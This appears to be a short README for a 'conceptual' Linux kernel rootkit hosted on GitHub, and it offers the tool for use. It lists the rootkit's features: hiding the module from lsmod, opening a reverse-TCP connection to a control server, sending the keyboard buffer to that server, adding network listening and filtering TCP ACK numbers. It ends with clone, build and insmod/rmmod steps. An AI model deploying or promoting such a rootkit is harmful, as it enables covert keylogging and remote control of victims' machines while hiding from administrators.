A simple conceptual linux rootkit.
how it work:
– Hide the module:
+ Option1: Overwrite “lsmod”
+ Option2: Delete module listing “rootkit” from modules.
– Configure rootkit to be a client.
+ Will connect to the control-server on the 192.168.1.0/24 subnet.
+ This connection is, thus, a reverse-TCP connection.
Rootkit dot ko listeners
with function:
– Send keyboard buffer to control server.
– Add network-listening functionality.
– Filter out “ACK” numbers from TCP packets.
Usage:
* START: $> insmod rootkit.ko
* STOP : $> rmmod rootkit
Installation :
git clone https://github.com/AIPSec/Concept-Rootkit
cd Concept-Rootkit/src
make
Source :https://github.com/AIPSec